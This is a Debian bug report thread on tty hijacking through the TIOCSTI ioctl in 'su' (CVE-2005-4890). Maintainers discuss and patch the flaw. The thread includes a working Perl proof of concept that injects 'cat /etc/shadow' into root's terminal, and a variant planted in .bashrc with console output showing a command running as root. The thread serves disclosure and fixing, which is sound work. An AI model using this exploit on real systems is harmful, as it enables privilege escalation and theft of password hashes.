login: tty hijacking possible in "su" via TIOCSTI ioctl

Debian Bug report logs - #628843
login: tty hijacking possible in "su" via TIOCSTI ioctl

Reply or subscribe to this bug.

Toggle useless messages

---

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: login
Version: 1:4.1.4.2+svn3283-2+squeeze1
Severity: critical

After investigating why RedHat have a different behavior regarding "su -c" I
found out that there was a patch in RedHat to prevent tty hijacking when using
"su -c".

What makes the hijacking possible is that "su -c" still gives the command a
controlling tty, which means it has ioctl access to /dev/tty. This means it
can send things to the tty input buffer, which will be read just after su
ends.

The original report (with patch) on RedHat (from 2005?!?!?!) is:
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=173008

A very simple exploit follows (Perl code)

____BEGIN_CODE____
#!/usr/bin/perl
require "sys/ioctl.ph";
open my $tty_fh, '<', '/dev/tty' or die $!;
foreach my $c (split //, 'cat /etc/shadow'.$/) {
    ioctl($tty_fh, &TIOCSTI, $c);
}
____END_CODE____

The scenario is:

Root runs a command as a less priviledged user with "su -c", if the user was
compromised, the script will be able to run commands as root by injecting
keystrokes on the terminal.

-- System Information:
Debian Release: 6.0.1
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages login depends on:
ii  libc6                         2.11.2-10  Embedded GNU C Library: Shared lib
ii  libpam-modules                1.1.1-6.1  Pluggable Authentication Modules f
ii  libpam-runtime                1.1.1-6.1  Runtime support for the PAM librar
ii  libpam0g                      1.1.1-6.1  Pluggable Authentication Modules l

login recommends no packages.

login suggests no packages.

-- no debconf information

---

Message #10 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

tags 628843 help security
thanks

Security team, I need advice and help here. My co-maintainer for
shadow, Nicolas, is more or less MIA, so I'm left nearly alone to
maintain shadow. As Nicolas was also upstream, you understand how
desperate is my situation..:-)

(maybe this bug will ring a bell for Nicolas, still)

My expertise is, as you may expect, way outreached. So, in short, what
I need is someone with enough expertise to look at this bug report and
help deciding if adopting Redhat's patch is correct (assuming it
applies: I'm not sure that RH is using the same "su" than we do).

Mail CC'ed to submitter, too, so that Daniel also knows that the only
person who answers....needs help..:-)

----- Forwarded message from Daniel Ruoso <daniel@ruoso.com> -----

Date: Wed, 1 Jun 2011 15:24:47 -0400
From: Daniel Ruoso <daniel@ruoso.com>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: [Pkg-shadow-devel] Bug#628843: login: tty hijacking possible in "su" via TIOCSTI ioctl
Reply-To: Daniel Ruoso <daniel@ruoso.com>, 628843@bugs.debian.org
X-CRM114-Status: Good  ( pR: 39.0933 )

Package: login
Version: 1:4.1.4.2+svn3283-2+squeeze1
Severity: critical

After investigating why RedHat have a different behavior regarding "su -c" I
found out that there was a patch in RedHat to prevent tty hijacking when using
"su -c".

What makes the hijacking possible is that "su -c" still gives the command a
controlling tty, which means it has ioctl access to /dev/tty. This means it
can send things to the tty input buffer, which will be read just after su
ends.

The original report (with patch) on RedHat (from 2005?!?!?!) is:
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=173008

A very simple exploit follows (Perl code)

____BEGIN_CODE____
#!/usr/bin/perl
require "sys/ioctl.ph";
open my $tty_fh, '<', '/dev/tty' or die $!;
foreach my $c (split //, 'cat /etc/shadow'.$/) {
    ioctl($tty_fh, &TIOCSTI, $c);
}
____END_CODE____

The scenario is:

Root runs a command as a less priviledged user with "su -c", if the user was
compromised, the script will be able to run commands as root by injecting
keystrokes on the terminal.

-- System Information:
Debian Release: 6.0.1
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages login depends on:
ii  libc6                         2.11.2-10  Embedded GNU C Library: Shared lib
ii  libpam-modules                1.1.1-6.1  Pluggable Authentication Modules f
ii  libpam-runtime                1.1.1-6.1  Runtime support for the PAM librar
ii  libpam0g                      1.1.1-6.1  Pluggable Authentication Modules l

login recommends no packages.

login suggests no packages.

-- no debconf information



_______________________________________________
Pkg-shadow-devel mailing list
Pkg-shadow-devel@lists.alioth.debian.org
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-shadow-devel


----- End forwarded message -----

-- 

[signature.asc (application/pgp-signature, inline)]

---

Message #20 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

On Thu, Jun 02, 2011 at 07:34:59AM +0200, Christian PERRIER wrote:
> My expertise is, as you may expect, way outreached. So, in short, what
> I need is someone with enough expertise to look at this bug report and
> help deciding if adopting Redhat's patch is correct (assuming it
> applies: I'm not sure that RH is using the same "su" than we do).

Ok, to give more context to the fix applied by RedHat.

What they did was use setsid() to start a new session and remove the
controlling terminal from the running command. This removes from the
child process the ability to open "/dev/tty", which is how the
hijacking works.

But doing only that is complicated because the translation of Ctrl+C
to SIGINT depends on controlling the tty, so you wouldn't be able to
stop the process easily. What they did was simply to add SIGINT to the
signal mask that causes the su to exit the waitpit loop.

The thing I don't like about RedHat's patch is that it turns a SIGINT
on su into a SIGTERM to the process, it would be better to send the
same signal received.

I don't have the time to do it right now, but I can give a shot on
writing a patch that preserves the signal interaction sane, which is
not the case in RedHat.

daniel

[signature.asc (application/pgp-signature, inline)]

---

Message #25 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

Hello,

Here is a patch proposal. It forwards the right signal to the child also
supports SIGTSTP.

I would appreciate if this could be reviewed by somebody more confident
with signal processing than me.

I expect sudo to have the same issue.

Also sg probably has the same issue (i.e. it cannot be used to drop group
privileges). I will look at it.

Other utils to switch user or group might also be affected.
(Anybody got a list and could try?)


Best Regards,
-- 
Nekral

[su_628843.patch (text/x-diff, attachment)]

---

Message #30 received at 628843@bugs.debian.org (full text, mbox, reply):

Op donderdag 02 juni 2011 07:34:59 schreef Christian PERRIER:
> Security team, I need advice and help here. My co-maintainer for
> shadow, Nicolas, is more or less MIA, so I'm left nearly alone to
> maintain shadow. As Nicolas was also upstream, you understand how
> desperate is my situation..:-)
> 
> (maybe this bug will ring a bell for Nicolas, still)
> 
> My expertise is, as you may expect, way outreached. So, in short, what
> I need is someone with enough expertise to look at this bug report and
> help deciding if adopting Redhat's patch is correct (assuming it
> applies: I'm not sure that RH is using the same "su" than we do).
> 
> Mail CC'ed to submitter, too, so that Daniel also knows that the only
> person who answers....needs help..:-)

Hi Christian,

I'm just mailing to confirm that we did record the issue in our tracker and to 
point out that this issue is currently also discueed on oss-security:
http://thread.gmane.org/gmane.comp.security.oss.general/5172


Thijs

---

Message #38 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

Quoting Thijs Kinkhorst (thijs@debian.org):

> Hi Christian,
> 
> I'm just mailing to confirm that we did record the issue in our tracker and to 
> point out that this issue is currently also discueed on oss-security:
> http://thread.gmane.org/gmane.comp.security.oss.general/5172

Thanks, Thijs, for your answer.

I'm more reliefed now that Nicolas popped up and even proposed a
preliminary patch. I don't have the expertise to give any advice about
his patch but I think that we have there a good start for  an
up-to-come fix.

During last week, Nicolas was active "cleaning out" things for shadow
so I think we can have some good hope to have a fixed issue at some
moment in the near future...

But, as Nicolas mentioned, an expert review of his proposal would be
very much welcomed.

[signature.asc (application/pgp-signature, inline)]

---

Message #46 received at 628843@bugs.debian.org (full text, mbox, reply):

Hello,

One more point to be reviewed.

shadow-utils supports also configurations where PAM is not used.
In that case, su does not fork to exec the interactive shell / command, so
I cannot use setsid().

In that case, I intend to use:

#include <termios.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
	int fd;
	if ((fd = open ("/dev/tty", O_RDWR)) >= 0) {
		ioctl (fd, TIOCNOTTY, (char *) 0);
		close (fd);
	}

I think this should be sufficient to protect the terminal (i.e.
re-attaching to it is not possible). This looks simpler than:
	pid_t child = fork();
	if (child == -1) {
		...
	} else if (child > 0) {
		_exit(0);
	}
	setsid();
(In this version I would need again to handle the signals manually instead
of the _exit())

Also if the above ioctl is sufficient, is there a benefit from setsid()?

Best Regards,
-- 
Nekral

---

Message #56 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

This critical bug is now pending for more than 3 months. Is there any
update on the situation?

cu

AW
-- 
[...] If you don't want to be restricted, don't agree to it. If you are
coerced, comply as much as you must to protect yourself, just don't support
it. Noone can free you but yourself. (crag, on Debian Planet)
Arne Wichmann (aw@linux.de)

[signature.asc (application/pgp-signature, inline)]

---

Message #61 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

Quoting Arne Wichmann (aw@anhrefn.saar.de):
> This critical bug is now pending for more than 3 months. Is there any
> update on the situation?

Nicolas should actually release upstream 4.1.5 and thenupload
4.1.5-1. Nicolas?

[signature.asc (application/pgp-signature, inline)]

---

Message #66 received at 628843@bugs.debian.org (full text, mbox, reply):

Hello,

On Sun, Oct 16, 2011 at 05:20:31PM +0200, bubulle@debian.org wrote:
> Quoting Arne Wichmann (aw@anhrefn.saar.de):
> > This critical bug is now pending for more than 3 months. Is there any
> > update on the situation?
> 
> Nicolas should actually release upstream 4.1.5 and then upload
> 4.1.5-1. Nicolas?

Yes, this is the plan.
There are still some untested changes, and I still have a few uncommitted
changes on my tree.

Regarding this bug
 * Arne, I do not know if your ping was related to the potential security
   impact, but it could help to have an assessment of the proposed solution
   (and also comment 46)
 * It did not seem that critical to me (e.g. in the pointed
   comp.security.oss.general thread, there were no agreement for a CVE)

-- 
Nekral

---

Message #71 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

begin  quotation  from Nicolas François (in <20111017211732.GJ16703@nekral.nekral.homelinux.net>):
> On Sun, Oct 16, 2011 at 05:20:31PM +0200, bubulle@debian.org wrote:
> > Quoting Arne Wichmann (aw@anhrefn.saar.de):
> > > This critical bug is now pending for more than 3 months. Is there any
> > > update on the situation?
> > 
> > Nicolas should actually release upstream 4.1.5 and then upload
> > 4.1.5-1. Nicolas?
> 
> Yes, this is the plan.
> There are still some untested changes, and I still have a few uncommitted
> changes on my tree.
> 
> Regarding this bug
>  * Arne, I do not know if your ping was related to the potential security
>    impact, but it could help to have an assessment of the proposed solution
>    (and also comment 46)

Ok, let me think...

- @@ -264,6 +264,11 @@
  This has the effect that "su -c ... " can no longer be used to call
  programs which use terminals - for example dialog. This should at least
  be prominently documented.

The rest looks like it could work. But I would not call myself a specialist
on Unix tty-handling.

The last sentence applies to comment 46, too.

>  * It did not seem that critical to me (e.g. in the pointed
>    comp.security.oss.general thread, there were no agreement for a CVE)

I do not really want to argue about bug severity here - this assessment is
better left to you. I did however use su in the past in non-interactive
scripts to lower privileges - if this isn't supported it should at least be
documented, again... ;-)

cu

AW
-- 
[...] If you don't want to be restricted, don't agree to it. If you are
coerced, comply as much as you must to protect yourself, just don't support
it. Noone can free you but yourself. (crag, on Debian Planet)
Arne Wichmann (aw@linux.de)

[signature.asc (application/pgp-signature, inline)]

---

Message #76 received at 628843@bugs.debian.org (full text, mbox, reply):

On Mon, Oct 17, 2011 at 11:17:32PM +0200, Nicolas François wrote:

> Regarding this bug
>  * Arne, I do not know if your ping was related to the potential security
>    impact, but it could help to have an assessment of the proposed solution
>    (and also comment 46)

Judging from the available documentation it seems fine, but I suggest
you consult Alan Cox (alan@linux.intel.com), who's done most of the
Linux tty scrutiny in the recent years for a second opinion.

>  * It did not seem that critical to me (e.g. in the pointed
>    comp.security.oss.general thread, there were no agreement for a CVE)

FWIW, this has been assigned CVE-2005-4890 in the mean time. This has
low impact, but it would be nice if we could fix this up in a stable
point update for Squeeze.

Cheers,
        Moritz

---

Message #81 received at 628843-close@bugs.debian.org (full text, mbox, reply):

Source: shadow
Source-Version: 1:4.1.5-1

We believe that the bug you reported is fixed in the latest version of
shadow, which is due to be installed in the Debian FTP archive:

login_4.1.5-1_i386.deb
  to main/s/shadow/login_4.1.5-1_i386.deb
passwd_4.1.5-1_i386.deb
  to main/s/shadow/passwd_4.1.5-1_i386.deb
shadow_4.1.5-1.diff.gz
  to main/s/shadow/shadow_4.1.5-1.diff.gz
shadow_4.1.5-1.dsc
  to main/s/shadow/shadow_4.1.5-1.dsc
shadow_4.1.5.orig.tar.gz
  to main/s/shadow/shadow_4.1.5.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 628843@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net> (supplier of updated shadow package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sun, 12 Feb 2012 22:27:03 +0100
Source: shadow
Binary: passwd login
Architecture: source i386
Version: 1:4.1.5-1
Distribution: unstable
Urgency: low
Maintainer: Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>
Changed-By: Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net>
Description: 
 login      - system login tools
 passwd     - change and administer password and group data
Closes: 544184 580434 584868 597661 602264 603315 605329 606159 609117 614321 616167 617295 620930 620978 621126 621330 621810 622106 622765 622834 622908 623608 623722 627526 628776 628777 628843 630250 630618 632461 634465 636047 647308 647469 655194 655858 656503 656686 657010 657514 657516 657621 657622 657710 657717
Changes: 
 shadow (1:4.1.5-1) unstable; urgency=low
 .
   * The "Charolais" release.
 .
   [ Nicolas FRANCOIS (Nekral) ]
   * New upstream release:
     - su: Fix possible tty hijacking by dropping the controlling terminal when
       executing a command (CVE-2005-4890). Closes: #628843
     - userdel: Check the existence of the user's mail spool before trying to
       remove it. If it does not exist, a warning is issued, but no failure.
       Closes: #617295
     - userdel: Do not remove a group with the same name as the user
       (usergroup) if this group isn't the user's primary group.
       Closes: #584868
     - su: Close the PAM session as root (fix issues with pam_mount and
       pam_systemd). Closes: #580434
     - Fix several typos in manpages. Thanks to Simon Brandmair.
       Closes: #628776
     - userdel error message has been clarified when the user is still
       executing processes (it used to complain that the user is logged in).
       Closes: #603315
     - passwd(1) references chpasswd(8). Closes: #609117
     - Spaces have been added between options and arguments in the Russian
       manpages. Closes: #606159
     - Fix handling of numerical dates in usermod -e. Closes: #621810
     - usermod: When the shadow file exists but there are no shadow entries, an
       entry is created if the password is changed and passwd requires a shadow
       entry, or if aging features are used (-e or -f). Closes: 632461
     - Added diagnosis for lock failures. Closes: #616167
     - grpck/pwck: NIS entries were dropped by -s (sort). Closes: #622765
     - login does not log into utmp(x) and wtmp. This is already done by
       pam_lastlog. Closes: #605329
     - groupmod: document that /etc/passwd can be modified by groupmod -g.
       Closes: #647308
     - Updated patches
       + debian/patches/008_login_log_failure_in_FTMP
       + debian/patches/401_cppw_src.dpatch
       + debian/patches/402_cppw_selinux
       + debian/patches/428_grpck_add_prune_option
       + debian/patches/429_login_FAILLOG_ENAB
       + debian/patches/463_login_delay_obeys_to_PAM
       + debian/patches/501_commonio_group_shadow
       + debian/patches/505_useradd_recommend_adduser
       + debian/patches/506_relaxed_usernames
       + debian/patches/508_nologin_in_usr_sbin
       + debian/patches/523_su_arguments_are_concatenated
       + debian/patches/523_su_arguments_are_no_more_concatenated_by_default
       + debian/patches/542_useradd-O_option
       + debian/patches/900_testsuite_groupmems
     - debian/patches/008_su_get_PAM_username: Removed, feature supported
       upstream.
     - debian/patches/300_CVE-2011-0721: Removed, applied upstream.
     - Upstream translation updates from Debian BTS:
       + Brazilian Portuguese. Closes: #622834
       + Catalan. Closes: #627526
       + Danish. Closes: #621330, #657514
       + German. Closes: #622908, #656503
       + French. Closes: #623608, #657621
       + Japanese. Closes: #620978
       + Kazakh. Closes: #620930
       + Portuguese. Closes: #623722, #656686
       + Russian. Closes: #622106, #655194
       + Spanish (Closes: #630618)
       + Swedish. Closes: #621126
       + Simplified Chinese. Closes: #655858
     - Upstream manpages translation updates from Debian BTS:
       + French. Closes: #630250, #657622
       + German. Closes: #628777
       + Simplified Chinese. Closes: #602264, #655858
       + Danish added. Closes: #657516
       + Russian. Closes: #657710
   * debian/control: mark passwd as 'Multi-Arch: foreign'. Closes: #614321
   * debian/securetty.linux: Add IBM pSeries console ports. Closes: #597661
   * debian/securetty.linux: Add serial Console for MIPS Swarm.
     (http://lists.debian.org/debian-release/2011/02/msg00320.html)
   * debian/securetty.linux: Add s390/s390x ports ttysclp0. Closes: #647469
   * debian/securetty.linux: Fixed typo: ttyama -> ttyAMA. Closes: #544184
   * debian/rules, debian/man.insert, debian/man.insert.sed: Bug #507673 has
     been closed. It is no more needed to patch the generated manpages. This
     also fix failures to build twice is a row. Closes: #636047
   * debian/patches/401_cppw_src.dpatch: Replace progname by Prog. Rename
     create_backup_file to create_copy. The lock functions do not set errno.
     Do not report the error string on cppwexit.
   * debian/patches/401_cppw_src.dpatch, debian/patches/402_cppw_selinux:
     Synchronize with coding style.
   * debian/patches/401_cppw_src.dpatch: Detect as well too many and too
     few arguments.
   * debian/patches/506_relaxed_usernames: Really check if the user/group
     name starts with a dash. Also forbid names starting with '+' or '~'.
     Document the naming policy in useradd.8 / groupadd.8.
   * debian/patches/506_relaxed_usernames: Also forbid names containing a
     comma.
   * debian/patches/901_testsuite_gcov: Do not revert the locale when testing
     with gcov to avoid coverage false negatives. This does not impact the
     debian binary package, only the test package.
   * debian/control: Add Build-Depends on libsemanage1-dev [linux-any]
   * debian/rules: Do not hard-code CFLAGS and LDFLAGS. Build with all
     hardening flags set. Closes: #657010
   * debian/control: depends on dpkg-dev (>= 1.16.1~) for including
     /usr/share/dpkg/buildflags.mk
   * debian/control: Standards-Version: bumped to 3.9.2. No changes.
   * debian/login.defs: Set the default encryption method to SHA512.
     Closes: #657717
 .
   [ Christian Perrier ]
   * Use "linux-any" instead of a negated list of architectures in
     Build-Depends. Closes: #634465
Checksums-Sha1: 
 20e1b380f87ab47b1dc4df181e0d5bccaa1351bf 1571 shadow_4.1.5-1.dsc
 57aa71b24378e3e549a5424ff7dc717d92ca266e 3426609 shadow_4.1.5.orig.tar.gz
 2f900ce1e275133fd440e4190aa41ff8cee4d086 80614 shadow_4.1.5-1.diff.gz
 06fe5fc7c55a199b178dd1122a393741dfb1f5ad 1269570 passwd_4.1.5-1_i386.deb
 1b0d5f4693d151ab94a9cbd56677440c2cd7d7b4 982270 login_4.1.5-1_i386.deb
Checksums-Sha256: 
 a82f4432ec52aa6c163a4093db27f315dc36656863508fa5ac1598948ece7c3d 1571 shadow_4.1.5-1.dsc
 11decbb65bc35aacd27b27f2e8c56eec0047dab056ebbaf5d07e55c42fcf63d1 3426609 shadow_4.1.5.orig.tar.gz
 cd76ac895667fe8e8866b5adc3d5d84784950f53fd8926c348b72dda7ea6a3fc 80614 shadow_4.1.5-1.diff.gz
 cf489b966bb36c150aafe392bf179acac4652a5ae0a0cb5c6e5bdf4c31683950 1269570 passwd_4.1.5-1_i386.deb
 7aab48e006cc159c8b277879a5f2c3611bca78d00c01f9bf256d6a947e3a11a2 982270 login_4.1.5-1_i386.deb
Files: 
 7797ed0ee9acb4a6c5819a671f653299 1571 admin required shadow_4.1.5-1.dsc
 18a0142a9c22d5c85297358398e99b0c 3426609 admin required shadow_4.1.5.orig.tar.gz
 a42217dda63d7c92f9717036b37a9578 80614 admin required shadow_4.1.5-1.diff.gz
 84e72e93ea8fe69b74bf8dc028c13284 1269570 admin required passwd_4.1.5-1_i386.deb
 982b60b21762a0ce12e9bf983740b937 982270 admin required login_4.1.5-1_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk84OJsACgkQWgo5mup89a2V5ACeJNx7QyHEshAj/ycISL5FFw5y
0FoAn1r8naDGD7yfdU+TxVT70XeBwREA
=ncUx
-----END PGP SIGNATURE-----

---

Message #86 received at 628843@bugs.debian.org (full text, mbox, reply):

Hello,

I'm bumping this bug to point out that the problem is not 100% fixed.
Even though "su -c" is now safe, interactive "su" or "su -" are still at
risk and this should probably be reflected here on the BTS.

Unfortunately I don't see any way to fix this without removing the
controlling terminal of su'ed interactive shells like "su -c" does, but
this would totally cripple su and render su'ed interactive shells
unusable ("su" would then become equivalent to "su -c $SHELL" and we'd
hit bug #659878 which is a PITA).

I'll leave it to you maintainers whether to actually reopen this bug or not.


Scenario:
root uses su to get an interactive shell into a compromised user
account, which uses the aforementioned exploit, just slightly modified
to send an exit before the actual payload.

On the compromised account side:
---- CONSOLE OUTPUT ----
test-user$ cat ~/exploit.pl
#!/usr/bin/perl
require "sys/ioctl.ph";
open my $tty_fh, '<', '/dev/tty' or die $!;
foreach my $c (split //, "exit\n".'echo Payload as $(whoami)'.$/) {
    ioctl($tty_fh, &TIOCSTI, $c);
}

test-user$ cat ~/.bashrc
<snip>
perl $HOME/exploit.pl
---- END CONSOLE OUTPUT ----

Now root actually uses su. Note that the only user keystrokes are the
initial "su test-user", the rest is entirely automatic and part of the
exploit (I included the user/root shell prompts as displayed on my
terminal).

---- CONSOLE OUTPUT ----
root# su test-user
exit
echo Payload as $(whoami)
test-user$ exit
root# echo Payload as $(whoami)
Payload as root
---- END CONSOLE OUTPUT ----


-- 
Ismaël RUAU

---

Message #95 received at 628843@bugs.debian.org (full text, mbox, reply):

Hello, 

I think Ismaël has a point here: 

> I'm bumping this bug to point out that the problem is not 100% fixed.
> Even though "su -c" is now safe, interactive "su" or "su -" are still at
> risk and this should probably be reflected here on the BTS.

I successfully used this on my up-to-date Squeeze system. 

However, one can use the following workaround to avoid giving root access: 
 # exec su baduser 

However this is still problematic: 
 niceguy$ su
    root$ exec su badguy
  badguy$ ./exploit.pl 

 => the command is still launched by niceguy. 

Not sure if a "good" solution exists... 

Fabien C. 

---

Message #100 received at 628843@bugs.debian.org (full text, mbox, reply):

found 1:4.1.5.1-1

This problem still exists in Wheezy.

-- 
Ismaël RUAU

---

Message #105 received at 628843@bugs.debian.org (full text, mbox, reply):

Hi,

the last few comments in this bug have suggested there may not be a good
solution for this problem.

As mdeslaur has pointed out in irc, one solution would be to have
interactive su use a new pty for the session.  Not trivial, but
if the idea itself isn't objectionable I wouldn't mind trying a
patch when I find time.

Alternatively, we could simply update the su man page to recommend
su only be used for increasing privilege (becoming root), and recommend
other means for dropping privilege or switching users.

---

Message #110 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

Hello,

On Wed, Mar 06, 2013 at 11:23:01AM -0600, Serge
Hallyn wrote:
> As mdeslaur has pointed out in irc, one solution
> would be to have interactive su use a new pty
> for the session.  Not trivial,

and not very portable too. The best pty handling
is done by Expect (Tcl/Expect) IMHO, but its code
looks too complex.

Probably, we should do the simplified pty for
selected platforms (GNU/Linux, FreeBSD) and try
not to break others (and leave them vulnerable
until someone cares much).

> Alternatively, we could simply update the su man
> page to recommend su only be used for increasing
> privilege (becoming root), and recommend other
> means for dropping privilege or switching users.

IMHO we should do both -- first update the su man
page (and leave it so for other platforms), then
implement pty workaround for Linux and BSD and
restore su manpage for Linux/BSD.

-- 
With best regards,
xrgtn

[signature.asc (application/pgp-signature, inline)]

---

Message #121 received at 628843@bugs.debian.org (full text, mbox, reply):

Hello,

IMHO it is not the right approach in just simply dropping the
controlling terminal independent in using the parameter -c or not
because You cannot have an interactive shell without a
controlling terminal.

Sure, if you call anything else but a shell then it is IMHO up to
the application to drop the controlling terminal.

I think that in any case the right solution is in just flushing
the input queue before returning to the caller which would not
just protect in case of hijacking but also of buggy applications.

The following patch was just a quick fix of the actual version
in Wheezy 4.1.5.1 which worked for me and was tested by myself
with USE_PAM but also without PAM but in the later case just
from user 'root' to another user in using the above mentioned
exploit.

Maybe further tests are needed also in respect of the modified
signals.

The following patch as suggested solution:

___BEGIN_PATCH___
--- shadow-4.1.5.1.orig/src/su.c	2012-05-25 13:51:55.000000000 +0200
+++ shadow-4.1.5.1/src/su.c	2013-03-29 21:52:11.930790904 +0100
@@ -62,8 +62,8 @@
 #include <stdio.h>
 #include <sys/types.h>
 #include <unistd.h>
-#ifndef USE_PAM
 #include <sys/ioctl.h>
+#ifndef USE_PAM
 #include <sys/types.h>
 #include <sys/stat.h>
 #include <fcntl.h>
@@ -106,10 +106,10 @@ static bool change_environment = true;

 #ifdef USE_PAM
 static pam_handle_t *pamh = NULL;
+#endif
 static int caught = 0;
 /* PID of the child, in case it needs to be killed */
 static pid_t pid_child = 0;
-#endif

 /*
  * External identifiers
@@ -123,10 +123,9 @@ extern size_t newenvc; /* libmisc/env.c
 static void execve_shell (const char *shellname,
                           char *args[],
                           char *const envp[]);
-#ifdef USE_PAM
 static RETSIGTYPE kill_child (int unused(s));
-static void prepare_pam_close_session (void);
-#else				/* !USE_PAM */
+static void prepare_close_session (void);
+#ifndef USE_PAM
 static RETSIGTYPE die (int);
 static bool iswheel (const char *);
 #endif				/* !USE_PAM */
@@ -177,7 +176,8 @@ static bool iswheel (const char *usernam
 	}
 	return is_on_list (grp->gr_mem, username);
 }
-#else				/* USE_PAM */
+#endif				/* USE_PAM */
+
 static RETSIGTYPE kill_child (int unused(s))
 {
 	if (0 != pid_child) {
@@ -189,7 +189,6 @@ static RETSIGTYPE kill_child (int unused
 	}
 	exit (255);
 }
-#endif				/* USE_PAM */

 /* borrowed from GNU sh-utils' "su.c" */
 static bool restricted_shell (const char *shellname)
@@ -260,7 +259,6 @@ static void execve_shell (const char *sh
 	}
 }

-#ifdef USE_PAM
 /* Signal handler for parent process later */
 static void catch_signals (int sig)
 {
@@ -268,12 +266,12 @@ static void catch_signals (int sig)
 }

 /*
- * prepare_pam_close_session - Fork and wait for the child to close the session
+ * prepare_close_session - Fork and wait for the child to close the session
  *
  *	Only the child returns. The parent will wait for the child to
  *	terminate and exit.
  */
-static void prepare_pam_close_session (void)
+static void prepare_close_session (void)
 {
 	sigset_t ourset;
 	int status;
@@ -311,17 +309,6 @@ static void prepare_pam_close_session (v
 		if (   (sigaddset (&ourset, SIGTERM) != 0)
 		    || (sigaddset (&ourset, SIGALRM) != 0)
 		    || (sigaction (SIGTERM, &action, NULL) != 0)
-		    || (   !doshell /* handle SIGINT (Ctrl-C), SIGQUIT
-		                     * (Ctrl-\), and SIGTSTP (Ctrl-Z)
-		                     * since the child will not control
-		                     * the tty.
-		                     */
-		        && (   (sigaddset (&ourset, SIGINT)  != 0)
-		            || (sigaddset (&ourset, SIGQUIT) != 0)
-		            || (sigaddset (&ourset, SIGTSTP) != 0)
-		            || (sigaction (SIGINT,  &action, NULL) != 0)
-		            || (sigaction (SIGQUIT, &action, NULL) != 0)
-		            || (sigaction (SIGTSTP,  &action, NULL) != 0)))
 		    || (sigprocmask (SIG_UNBLOCK, &ourset, NULL) != 0)
 		    ) {
 			fprintf (stderr,
@@ -366,6 +353,12 @@ static void prepare_pam_close_session (v
 		} while (!stop);
 	}

+	/* This avoids the callee to inject commands on
+	 * the caller's tty including srappy incidents. */
+	ret = ioctl( STDIN_FILENO, TCFLSH, TCIFLUSH);
+	if( ret == -1)
+		fprintf (stderr, _("%s: Flushing input: %s\n"), Prog, strerror( errno));
+
 	if (0 != caught) {
 		(void) fputs ("\n", stderr);
 		(void) fputs (_("Session terminated, terminating shell..."),
@@ -373,6 +366,7 @@ static void prepare_pam_close_session (v
 		(void) kill (pid_child, caught);
 	}

+#ifdef USE_PAM
 	ret = pam_close_session (pamh, 0);
 	if (PAM_SUCCESS != ret) {
 		SYSLOG ((LOG_ERR, "pam_close_session: %s",
@@ -382,6 +376,7 @@ static void prepare_pam_close_session (v

 	(void) pam_setcred (pamh, PAM_DELETE_CRED);
 	(void) pam_end (pamh, PAM_SUCCESS);
+#endif				/* USE_PAM */

 	if (0 != caught) {
 		(void) signal (SIGALRM, kill_child);
@@ -395,7 +390,6 @@ static void prepare_pam_close_session (v
 	                                : WTERMSIG (status) + 128);
 	/* Only the child returns. See above. */
 }
-#endif				/* USE_PAM */

 /*
  * usage - print command line syntax and exit
@@ -1057,13 +1051,16 @@ int main (int argc, char **argv)
 		exit (1);
 	}

-	prepare_pam_close_session ();
+	prepare_close_session ();

 	/* become the new user */
 	if (change_uid (pw) != 0) {
 		exit (1);
 	}
 #else				/* !USE_PAM */
+
+	prepare_close_session ();
+
 	/* no limits if su from root (unless su must fake login's behavior) */
 	if (!caller_is_root || fakelogin) {
 		setup_limits (pw);
@@ -1076,36 +1073,6 @@ int main (int argc, char **argv)

 	set_environment (pw);

-	if (!doshell) {
-		/* There is no need for a controlling terminal.
-		 * This avoids the callee to inject commands on
-		 * the caller's tty. */
-		int err = -1;
-
-#ifdef USE_PAM
-		/* When PAM is used, we are on the child */
-		err = setsid ();
-#else
-		/* Otherwise, we cannot use setsid */
-		int fd = open ("/dev/tty", O_RDWR);
-
-		if (fd >= 0) {
-			err = ioctl (fd, TIOCNOTTY, (char *) 0);
-			(void) close (fd);
-		} else if (ENXIO == errno) {
-			/* There are no controlling terminal already */
-			err = 0;
-		}
-#endif				/* USE_PAM */
-
-		if (-1 == err) {
-			(void) fprintf (stderr,
-			                _("%s: Cannot drop the controlling terminal\n"),
-			                Prog);
-			exit (1);
-		}
-	}
-
 	/*
 	 * PAM_DATA_SILENT is not supported by some modules, and
 	 * there is no strong need to clean up the process space's
___END_PATCH___




with best regards

Wolf

---

